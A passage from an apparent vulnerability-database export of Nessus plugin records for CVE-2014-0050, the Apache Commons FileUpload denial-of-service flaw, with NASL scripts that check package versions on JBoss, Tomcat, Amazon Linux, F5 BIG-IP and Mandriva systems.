section.\n\nRed Hat JBoss Enterprise Application Platform 6 is a platform for Java\napplications based on JBoss Application Server 7.\n\nA denial of service flaw was found in the way Apache Commons\nFileUpload, which is embedded in the JBoss Web component of JBoss EAP,\nhandled small-sized buffers used by MultipartStream. A remote attacker\ncould use this flaw to create a malformed Content-Type header for a\nmultipart request, causing JBoss Web to enter an infinite loop when\nprocessing such an incoming request. (CVE-2014-0050)\n\nWarning: Before applying this update, back up your existing Red Hat\nJBoss Enterprise Application Platform installation and deployed\napplications.\n\nAll users of Red Hat JBoss Enterprise Application Platform 6.2.1 on\nRed Hat Enterprise Linux 5 and 6 are advised to upgrade to these\nupdated packages. 
The JBoss server process must be restarted for the\nupdate to take effect.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/errata/RHSA-2014:0253\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2014-0050\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected jbossweb package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jbossweb\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:5\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:6\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/04/01\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/03/05\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/03/06\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2021 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = pregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(5|6)([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 5.x / 6.x\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2014:0253\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n\n if (! 
(rpm_exists(release:\"RHEL5\", rpm:\"jbossweb-\") || rpm_exists(release:\"RHEL6\", rpm:\"jbossweb-\"))) audit(AUDIT_PACKAGE_NOT_INSTALLED, \"JBoss EAP\");\n\n if (rpm_check(release:\"RHEL5\", reference:\"jbossweb-7.3.0-2.Final_redhat_2.1.ep6.el5\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", reference:\"jbossweb-7.3.0-2.Final_redhat_2.1.ep6.el6\")) flag++;\n\n if (flag)\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get() + redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"jbossweb\");\n }\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-01T01:18:46", "description": "MultipartStream.java in Apache Commons FileUpload before 1.3.1, as\nused in Apache Tomcat, JBoss Web, and other products, allows remote\nattackers to cause a denial of service (infinite loop and CPU\nconsumption) via a crafted Content-Type header that bypasses a loop's\nintended exit conditions.", "edition": 24, "published": "2014-03-28T00:00:00", "title": "Amazon Linux AMI : tomcat7 (ALAS-2014-312)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-0050"], "modified": "2021-01-02T00:00:00", "cpe": ["p-cpe:/a:amazon:linux:tomcat7-docs-webapp", "p-cpe:/a:amazon:linux:tomcat7-servlet-3.0-api", "p-cpe:/a:amazon:linux:tomcat7-el-2.2-api", "p-cpe:/a:amazon:linux:tomcat7-lib", "p-cpe:/a:amazon:linux:tomcat7", "p-cpe:/a:amazon:linux:tomcat7-jsp-2.2-api", "p-cpe:/a:amazon:linux:tomcat7-javadoc", "p-cpe:/a:amazon:linux:tomcat7-admin-webapps", "p-cpe:/a:amazon:linux:tomcat7-webapps", "cpe:/o:amazon:linux"], "id": "ALA_ALAS-2014-312.NASL", "href": "https://www.tenable.com/plugins/nessus/73231", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Amazon Linux AMI Security Advisory 
ALAS-2014-312.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(73231);\n script_version(\"1.9\");\n script_cvs_date(\"Date: 2018/04/18 15:09:35\");\n\n script_cve_id(\"CVE-2014-0050\");\n script_xref(name:\"ALAS\", value:\"2014-312\");\n\n script_name(english:\"Amazon Linux AMI : tomcat7 (ALAS-2014-312)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Amazon Linux AMI host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"MultipartStream.java in Apache Commons FileUpload before 1.3.1, as\nused in Apache Tomcat, JBoss Web, and other products, allows remote\nattackers to cause a denial of service (infinite loop and CPU\nconsumption) via a crafted Content-Type header that bypasses a loop's\nintended exit conditions.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://alas.aws.amazon.com/ALAS-2014-312.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Run 'yum update tomcat7' to update your system.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:tomcat7\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:tomcat7-admin-webapps\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:tomcat7-docs-webapp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:tomcat7-el-2.2-api\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:tomcat7-javadoc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:tomcat7-jsp-2.2-api\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:tomcat7-lib\");\n script_set_attribute(attribute:\"cpe\", 
value:\"p-cpe:/a:amazon:linux:tomcat7-servlet-3.0-api\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:tomcat7-webapps\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:amazon:linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/03/24\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/03/28\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2018 Tenable Network Security, Inc.\");\n script_family(english:\"Amazon Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/AmazonLinux/release\", \"Host/AmazonLinux/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/AmazonLinux/release\");\nif (isnull(release) || !strlen(release)) audit(AUDIT_OS_NOT, \"Amazon Linux\");\nos_ver = pregmatch(pattern: \"^AL(A|\\d)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Amazon Linux\");\nos_ver = os_ver[1];\nif (os_ver != \"A\")\n{\n if (os_ver == 'A') os_ver = 'AMI';\n audit(AUDIT_OS_NOT, \"Amazon Linux AMI\", \"Amazon Linux \" + os_ver);\n}\n\nif (!get_kb_item(\"Host/AmazonLinux/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (rpm_check(release:\"ALA\", reference:\"tomcat7-7.0.47-1.38.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"tomcat7-admin-webapps-7.0.47-1.38.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"tomcat7-docs-webapp-7.0.47-1.38.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"tomcat7-el-2.2-api-7.0.47-1.38.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"tomcat7-javadoc-7.0.47-1.38.amzn1\")) flag++;\nif 
(rpm_check(release:\"ALA\", reference:\"tomcat7-jsp-2.2-api-7.0.47-1.38.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"tomcat7-lib-7.0.47-1.38.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"tomcat7-servlet-3.0-api-7.0.47-1.38.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"tomcat7-webapps-7.0.47-1.38.amzn1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"tomcat7 / tomcat7-admin-webapps / tomcat7-docs-webapp / etc\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-09-14T19:09:30", "description": "According to its self-reported version number, the instance of Apache\nTomcat 7.0.x listening on the remote host is prior to 7.0.52. It is,\ntherefore, affected by an error related to handling 'Content-Type'\nHTTP headers and multipart requests such as file uploads.\n\nNote that this error exists because of the bundled version of Apache\nCommons FileUpload.\n\nNote that Nessus has not tested for this issue but has instead relied\nonly on the application's self-reported version number.", "edition": 18, "cvss3": {"score": 5.3, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L"}, "published": "2014-02-25T00:00:00", "title": "Apache Tomcat 7.0.x < 7.0.52 Content-Type DoS", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-0050"], "modified": "2014-02-25T00:00:00", "cpe": ["cpe:/a:apache:tomcat"], "id": "TOMCAT_7_0_52.NASL", "href": "https://www.tenable.com/plugins/nessus/72692", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(72692);\n script_version(\"1.15\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/03/11\");\n\n 
script_cve_id(\"CVE-2014-0050\");\n script_bugtraq_id(65400);\n script_xref(name:\"EDB-ID\", value:\"31615\");\n\n script_name(english:\"Apache Tomcat 7.0.x < 7.0.52 Content-Type DoS\");\n script_summary(english:\"Checks the Apache Tomcat version.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Apache Tomcat server is affected by a denial of service\nvulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its self-reported version number, the instance of Apache\nTomcat 7.0.x listening on the remote host is prior to 7.0.52. It is,\ntherefore, affected by an error related to handling 'Content-Type'\nHTTP headers and multipart requests such as file uploads.\n\nNote that this error exists because of the bundled version of Apache\nCommons FileUpload.\n\nNote that Nessus has not tested for this issue but has instead relied\nonly on the application's self-reported version number.\");\n script_set_attribute(attribute:\"see_also\", value:\"http://tomcat.apache.org/security-7.html#Fixed_in_Apache_Tomcat_7.0.52\");\n # http://mail-archives.apache.org/mod_mbox/www-announce/201402.mbox/%3C52F373FC.9030907@apache.org%3E\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?358ef049\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update to Apache Tomcat version 7.0.52 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2014-0050\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", 
value:\"2014/02/06\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/02/17\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/02/25\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"combined\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:apache:tomcat\");\n script_set_attribute(attribute:\"agent\", value:\"all\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Web Servers\");\n\n script_copyright(english:\"This script is Copyright (C) 2014-2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"tomcat_error_version.nasl\", \"tomcat_win_installed.nbin\", \"apache_tomcat_nix_installed.nbin\");\n script_require_keys(\"installed_sw/Apache Tomcat\");\n\n\n exit(0);\n}\n\ninclude(\"tomcat_version.inc\");\n\n# Note that 7.0.51 contained the fix,\n# but was never released.\ntomcat_check_version(fixed:\"7.0.51\", min:\"7.0.0\", severity:SECURITY_HOLE, granularity_regex:\"^7(\\.0)?$\");\n\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-01T01:57:59", "description": "MultipartStream.java in Apache Commons FileUpload before 1.3.1, as\nused in Apache Tomcat, JBoss Web, and other products, allows remote\nattackers to cause a denial of service (infinite loop and CPU\nconsumption) via a crafted Content-Type header that bypasses a loop's\nintended exit conditions. 
(CVE-2014-0050)", "edition": 28, "published": "2014-10-10T00:00:00", "title": "F5 Networks BIG-IP : Apache Commons FileUpload vulnerability (K15189)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-0050"], "modified": "2021-01-02T00:00:00", "cpe": ["cpe:/a:f5:big-ip_global_traffic_manager", "cpe:/a:f5:big-ip_link_controller", "cpe:/a:f5:big-ip_advanced_firewall_manager", "cpe:/a:f5:big-ip_policy_enforcement_manager", "cpe:/a:f5:big-ip_application_security_manager", "cpe:/a:f5:big-ip_application_acceleration_manager", "cpe:/h:f5:big-ip_protocol_security_manager", "cpe:/a:f5:big-ip_local_traffic_manager", "cpe:/a:f5:big-ip_wan_optimization_manager", "cpe:/h:f5:big-ip", "cpe:/a:f5:big-ip_application_visibility_and_reporting", "cpe:/a:f5:big-ip_webaccelerator", "cpe:/a:f5:big-ip_access_policy_manager"], "id": "F5_BIGIP_SOL15189.NASL", "href": "https://www.tenable.com/plugins/nessus/78165", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from F5 Networks BIG-IP Solution K15189.\n#\n# The text description of this plugin is (C) F5 Networks.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(78165);\n script_version(\"1.15\");\n script_cvs_date(\"Date: 2019/01/04 10:03:40\");\n\n script_cve_id(\"CVE-2014-0050\");\n script_bugtraq_id(65400);\n\n script_name(english:\"F5 Networks BIG-IP : Apache Commons FileUpload vulnerability (K15189)\");\n script_summary(english:\"Checks the BIG-IP version.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote device is missing a vendor-supplied security patch.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"MultipartStream.java in Apache Commons FileUpload before 1.3.1, as\nused in Apache Tomcat, JBoss Web, and other products, allows remote\nattackers to cause a denial of service (infinite loop and CPU\nconsumption) via a crafted Content-Type header that bypasses a 
loop's\nintended exit conditions. (CVE-2014-0050)\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://support.f5.com/csp/article/K15189\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Upgrade to one of the non-vulnerable versions listed in the F5\nSolution K15189.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"potential_vulnerability\", value:\"true\");\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_access_policy_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_advanced_firewall_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_application_acceleration_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_application_security_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_application_visibility_and_reporting\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_global_traffic_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_link_controller\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_local_traffic_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_policy_enforcement_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_wan_optimization_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_webaccelerator\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/h:f5:big-ip\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/h:f5:big-ip_protocol_security_manager\");\n\n 
script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/04/18\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/10/10\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"F5 Networks Local Security Checks\");\n\n script_dependencies(\"f5_bigip_detect.nbin\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/BIG-IP/hotfix\", \"Host/BIG-IP/modules\", \"Host/BIG-IP/version\", \"Settings/ParanoidReport\");\n\n exit(0);\n}\n\n\ninclude(\"f5_func.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nversion = get_kb_item(\"Host/BIG-IP/version\");\nif ( ! version ) audit(AUDIT_OS_NOT, \"F5 Networks BIG-IP\");\nif ( isnull(get_kb_item(\"Host/BIG-IP/hotfix\")) ) audit(AUDIT_KB_MISSING, \"Host/BIG-IP/hotfix\");\nif ( ! 
get_kb_item(\"Host/BIG-IP/modules\") ) audit(AUDIT_KB_MISSING, \"Host/BIG-IP/modules\");\n\nsol = \"K15189\";\nvmatrix = make_array();\n\nif (report_paranoia < 2) audit(AUDIT_PARANOID);\n\n# AFM\nvmatrix[\"AFM\"] = make_array();\nvmatrix[\"AFM\"][\"affected\" ] = make_list(\"11.3.0-11.5.4\");\nvmatrix[\"AFM\"][\"unaffected\"] = make_list(\"12.1.0\",\"12.0.0\",\"11.6.1\",\"11.6.0\",\"11.5.4HF2\",\"11.4.1HF10\");\n\n# AM\nvmatrix[\"AM\"] = make_array();\nvmatrix[\"AM\"][\"affected\" ] = make_list(\"11.4.0-11.5.4\");\nvmatrix[\"AM\"][\"unaffected\"] = make_list(\"12.1.0\",\"12.0.0\",\"11.6.1\",\"11.6.0\",\"11.5.4HF2\",\"11.4.1HF10\");\n\n# APM\nvmatrix[\"APM\"] = make_array();\nvmatrix[\"APM\"][\"affected\" ] = make_list(\"11.0.0-11.5.4\",\"10.1.0-10.2.4\");\nvmatrix[\"APM\"][\"unaffected\"] = make_list(\"12.1.0\",\"12.0.0\",\"11.6.1\",\"11.6.0\",\"11.5.4HF2\",\"11.4.1HF10\",\"11.2.1HF16\");\n\n# ASM\nvmatrix[\"ASM\"] = make_array();\nvmatrix[\"ASM\"][\"affected\" ] = make_list(\"11.0.0-11.5.4\",\"10.0.0-10.2.4\");\nvmatrix[\"ASM\"][\"unaffected\"] = make_list(\"12.1.0\",\"12.0.0\",\"11.6.1\",\"11.6.0\",\"11.5.4HF2\",\"11.4.1HF10\",\"11.2.1HF16\");\n\n# AVR\nvmatrix[\"AVR\"] = make_array();\nvmatrix[\"AVR\"][\"affected\" ] = make_list(\"11.0.0-11.5.4\");\nvmatrix[\"AVR\"][\"unaffected\"] = make_list(\"12.1.0\",\"12.0.0\",\"11.6.1\",\"11.6.0\",\"11.5.4HF2\",\"11.4.1HF10\",\"11.2.1HF16\");\n\n# GTM\nvmatrix[\"GTM\"] = make_array();\nvmatrix[\"GTM\"][\"affected\" ] = make_list(\"11.0.0-11.5.4\",\"10.0.0-10.2.4\");\nvmatrix[\"GTM\"][\"unaffected\"] = make_list(\"11.6.1\",\"11.6.0\",\"11.5.4HF2\",\"11.4.1HF10\",\"11.2.1HF16\");\n\n# LC\nvmatrix[\"LC\"] = make_array();\nvmatrix[\"LC\"][\"affected\" ] = make_list(\"11.0.0-11.5.4\",\"10.0.0-10.2.4\");\nvmatrix[\"LC\"][\"unaffected\"] = make_list(\"12.1.0\",\"12.0.0\",\"11.6.1\",\"11.6.0\",\"11.5.4HF2\",\"11.4.1HF10\",\"11.2.1HF16\");\n\n# LTM\nvmatrix[\"LTM\"] = make_array();\nvmatrix[\"LTM\"][\"affected\" ] = 
make_list(\"11.0.0-11.5.4\",\"10.0.0-10.2.4\");\nvmatrix[\"LTM\"][\"unaffected\"] = make_list(\"12.1.0\",\"12.0.0\",\"11.6.1\",\"11.6.0\",\"11.5.4HF2\",\"11.4.1HF10\",\"11.2.1HF16\");\n\n# PEM\nvmatrix[\"PEM\"] = make_array();\nvmatrix[\"PEM\"][\"affected\" ] = make_list(\"11.3.0-11.5.4\");\nvmatrix[\"PEM\"][\"unaffected\"] = make_list(\"12.1.0\",\"12.0.0\",\"11.6.1\",\"11.6.0\",\"11.5.4HF2\",\"11.4.1HF10\");\n\n# PSM\nvmatrix[\"PSM\"] = make_array();\nvmatrix[\"PSM\"][\"affected\" ] = make_list(\"11.0.0-11.4.1\",\"10.0.0-10.2.4\");\nvmatrix[\"PSM\"][\"unaffected\"] = make_list(\"11.4.1HF10\",\"11.2.1HF16\");\n\n# WAM\nvmatrix[\"WAM\"] = make_array();\nvmatrix[\"WAM\"][\"affected\" ] = make_list(\"11.0.0-11.3.0\",\"10.0.0-10.2.4\");\nvmatrix[\"WAM\"][\"unaffected\"] = make_list(\"11.2.1HF16\");\n\n# WOM\nvmatrix[\"WOM\"] = make_array();\nvmatrix[\"WOM\"][\"affected\" ] = make_list(\"11.0.0-11.3.0\",\"10.0.0-10.2.4\");\nvmatrix[\"WOM\"][\"unaffected\"] = make_list(\"11.2.1HF16\");\n\n\nif (bigip_is_affected(vmatrix:vmatrix, sol:sol))\n{\n if (report_verbosity > 0) security_hole(port:0, extra:bigip_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = bigip_get_tested_modules();\n audit_extra = \"For BIG-IP module(s) \" + tested + \",\";\n if (tested) audit(AUDIT_INST_VER_NOT_VULN, audit_extra, version);\n else audit(AUDIT_HOST_NOT, \"running any of the affected modules\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-07T11:54:34", "description": "Updated apache-commons-fileupload packages fix security \nvulnerability :\n\nIt was discovered that the Apache Commons FileUpload package for Java\ncould enter an infinite loop while processing a multipart request with\na crafted Content-Type, resulting in a denial-of-service condition\n(CVE-2014-0050).\n\nTomcat 7 includes an embedded copy of the Apache Commons FileUpload\npackage, and was affected as well.\n\nAdditionally a build problem with maven was 
discovered, fixed maven\npackages are also being provided with this advisory.", "edition": 24, "published": "2014-03-14T00:00:00", "title": "Mandriva Linux Security Advisory : apache-commons-fileupload (MDVSA-2014:056)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-0050"], "modified": "2014-03-14T00:00:00", "cpe": ["p-cpe:/a:mandriva:linux:tomcat-admin-webapps", "cpe:/o:mandriva:business_server:1", "p-cpe:/a:mandriva:linux:tomcat-docs-webapp", "p-cpe:/a:mandriva:linux:tomcat-servlet-3.0-api", "p-cpe:/a:mandriva:linux:tomcat-javadoc", "p-cpe:/a:mandriva:linux:tomcat-el-2.2-api", "p-cpe:/a:mandriva:linux:apache-commons-fileupload", "p-cpe:/a:mandriva:linux:tomcat-lib", "p-cpe:/a:mandriva:linux:tomcat", "p-cpe:/a:mandriva:linux:maven", "p-cpe:/a:mandriva:linux:tomcat-webapps", "p-cpe:/a:mandriva:linux:tomcat-jsvc", "p-cpe:/a:mandriva:linux:tomcat-jsp-2.2-api", "p-cpe:/a:mandriva:linux:apache-commons-fileupload-javadoc", "p-cpe:/a:mandriva:linux:maven-javadoc"], "id": "MANDRIVA_MDVSA-2014-056.NASL", "href": "https://www.tenable.com/plugins/nessus/73003", "sourceData": "#%NASL_MIN_LEVEL 70300\n\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Mandriva Linux Security Advisory MDVSA-2014:056. 
\n# The text itself is copyright (C) Mandriva S.A.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(73003);\n script_version(\"1.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2014-0050\");\n script_bugtraq_id(65400);\n script_xref(name:\"MDVSA\", value:\"2014:056\");\n\n script_name(english:\"Mandriva Linux Security Advisory : apache-commons-fileupload (MDVSA-2014:056)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Mandriva Linux host is missing one or more security\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated apache-commons-fileupload packages fix security \nvulnerability :\n\nIt was discovered that the Apache Commons FileUpload package for Java\ncould enter an infinite loop while processing a multipart request with\na crafted Content-Type, resulting in a denial-of-service condition\n(CVE-2014-0050).\n\nTomcat 7 includes an embedded copy of the Apache Commons FileUpload\npackage, and was affected as well.\n\nAdditionally a build problem with maven was discovered, fixed maven\npackages is also being provided with this advisory.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://advisories.mageia.org/MGASA-2014-0109.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://advisories.mageia.org/MGASA-2014-0110.html\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:ND/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n 
